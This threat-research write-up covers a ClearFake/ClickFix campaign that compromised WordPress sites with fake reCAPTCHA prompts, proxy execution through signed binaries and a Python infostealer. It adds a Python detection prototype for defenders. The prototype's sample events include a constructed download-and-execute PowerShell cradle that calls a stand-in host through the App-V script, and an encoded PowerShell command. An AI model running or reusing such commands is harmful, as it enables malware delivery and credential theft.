Vega Threat Research uncovered a large-scale ClearFake / ClickFix campaign compromising over 2,000 WordPress sites. The operation uses a multi-stage infection chain and appears to function as a multi-tenant traffic distribution system, where initial access and victim filtering are handled upstream, and final payload delivery is controlled by downstream actors. Notably, the campaign leverages “EtherHiding”-style techniques, retrieving parts of its delivery logic from blockchain-based infrastructure to make takedown and analysis more difficult.
The attack begins in the browser with injected scripts that profile the victim’s environment and selectively deliver a fake verification prompt to targeted users. This often takes the form of a spoofed reCAPTCHA challenge, adding legitimacy to the lure and increasing the likelihood of user interaction. Victims are then tricked into executing a command on their own system, effectively bypassing traditional browser-based protections.
Once executed, the infection chain leverages trusted, signed binaries to run malicious scripts under legitimate-looking processes. These scripts download and execute additional payloads while evading common security controls and establishing persistence on the system.
In its final stage, the campaign deploys Python-based malware components, including a full-featured information stealer and a secondary lightweight implant. The malware operates largely in memory and uses legitimate infrastructure to blend in with normal activity.
The stealer targets a wide range of sensitive data, including browser-stored credentials, session cookies, financial information, cryptocurrency wallets, messaging apps, and various desktop applications. It also supports surveillance capabilities and system reconnaissance, enabling continued access and further exploitation.
IOCs (25)
IP addresses (6), domains (10), SHA256 file hashes (4), file names (5)
Detections (10)
- Execution of WScript App-V Publishing script to proxy execution of PowerShell
- PowerShell Obfuscation Methods
- SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
- Detect extraction of web session cookies from browser processes or profile directories
- Alert on processes accessing browser credential stores, cookies, or session databases
- Detect encoded PowerShell, download cradles, and AMSI bypasses
- Detect executables masquerading as legitimate system files in non-standard directories
- Detect processes reading credential files, env vars, or config stores
- Detect clipboard-to-terminal paste operations containing encoded or obfuscated commands
- Detect malware resolving C2 addresses from public web services (pastebins, calendars, DNS TXT)
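The detections above for the App-V publishing script proxy and for encoded PowerShell can be prototyped over process-creation telemetry. The following is an added example written for this page, not code from the original report or from Vega Threat Research; it assumes Sysmon-style events with `Image` and `CommandLine` fields, and the sample events are constructed, not captured from the campaign.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real
# telemetry from the campaign. Field names follow Sysmon's Image / CommandLine.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" '
                    r'"n; iwr http://example.invalid/s | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r'cscript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs"'},
]

# Rule 1: the App-V publishing script is Microsoft-signed, but text after a ';' in its
# first argument is evaluated as PowerShell. Legitimate scheduled runs pass no such argument.
APPV_PROXY = re.compile(r'syncappvpublishingserver\.vbs"?\s+"?[^"]*;', re.IGNORECASE)
# Rule 2: -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en, -enc)
# followed by a base64 blob.
ENCODED_PS = re.compile(r'(^|\s)-e(c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}', re.IGNORECASE)
# Rule 3: a download cradle piped into Invoke-Expression, wherever it appears in the line.
CRADLE = re.compile(r'(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)'
                    r'.*(\biex\b|invoke-expression)', re.IGNORECASE)

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
PS_HOSTS = ("powershell.exe", "pwsh.exe")


def classify(event):
    """Return the names of the rules an event triggers (empty list = not flagged)."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    hits = []
    if image in SCRIPT_HOSTS and APPV_PROXY.search(cmd):
        hits.append("appv_vbs_powershell_proxy")
    if image in PS_HOSTS and ENCODED_PS.search(cmd):
        hits.append("encoded_powershell")
    # The cradle may sit inside the VBS argument as well as on a powershell.exe line.
    if image in SCRIPT_HOSTS + PS_HOSTS and CRADLE.search(cmd):
        hits.append("download_cradle")
    return hits


def triage(events):
    """Map the index of each flagged event to the rules it triggered."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

The benign third event (the script launched with no payload argument) is not flagged, which is the distinction the two App-V detections above rely on.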